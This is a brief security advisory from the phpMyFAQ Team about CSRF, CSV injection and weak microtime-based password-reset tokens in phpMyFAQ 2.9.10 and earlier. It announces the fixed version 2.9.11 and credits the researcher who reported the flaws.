The phpMyFAQ Team has learned of some security issues that have been discovered in phpMyFAQ 2.9.10 and earlier. phpMyFAQ contains cross-site request forgery, a CSV Injection and an insecure usage of microtime for password-reset tokens.
phpMyFAQ does not implement sufficient checks to avoid CSRF and CSV injection for the reports generated in the admin backend. For the CSRF and CSV injection you need administrator privileges to be executed. We also use microtime to generate the tokens of new passwords.
The phpMyFAQ Team has released the new phpMyFAQ versions 2.9.11 which fix the vulnerabilities. All users of affected phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest version.
There's no workaround except installing phpMyFAQ 2.9.11.
The phpMyFAQ teams would like to thank Zeel Chavda for the CSRF and CSV injection. We want to thank all for the responsible disclosure of these vulnerabilities.